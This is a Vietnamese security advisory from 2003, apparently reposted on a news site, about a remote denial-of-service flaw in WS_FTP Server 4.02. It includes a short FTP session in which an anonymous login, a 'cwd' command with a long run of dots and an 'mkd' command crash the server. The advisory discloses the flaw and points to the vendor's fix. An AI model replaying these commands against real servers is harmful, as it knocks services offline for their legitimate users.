Lỗi trong WS_FTP Server 4.02 có thể gây tình trạng DOS Attack thông qua Command CWD

Phiên bản : WS_FTP Server Version 4.02 / Tác Giả : Dr_insane Tóm tắt : WS_FTP Server được phát triển bởi Ipswitch , nó là một FTP Server dành cho Windows NT và Windows 2000 . Trong phiên bải 4.02 xay ra một lỗi cho phép tấn công từ chối dịch vụ từ xa . Một account hợp lệ trên Server có thể khai thác lỗi này ( thậm chí với account : Anonymous ) Chi tiêt : Ta kết nối đến 1 WS_FTP Server 4.02 : ftp 203.162.x.x 220-zaki X2 WS_FTP Server 4.0.2.EVAL (54328827) 220-Tue Dec 16 03:36:28 2003 220-29 days remaining on evaluation. 220 zaki X2 WS_FTP Server 4.0.2.EVAL (54328827) user anonymous pass test@security.com.vn // đăng nhập với account " Anonymous 230 user logged in // pwd // Kiểm tra xem mình đang năm ở thư mục nào 257 "/users/root" is current directory cwd .............. // sử dụng command CWD nguyên nhân gây ra tình trạng CASH 250 CWD successful pwd 257 "/users/root/.............." is current directory mkd a // <=== Cash WS_FTP Server Lúc này CPU sẽ gây ra tình trạng CASH đối với WS_FTP Server và từ chối mọi dịch vụ . Giải Pháp : các bạn có thể tìm cách fix lỗi tại đây : www.ipswitch.com
Thứ Năm, 25/12/2003 02:02
31 👨 283
0 Bình luận
Sắp xếp theo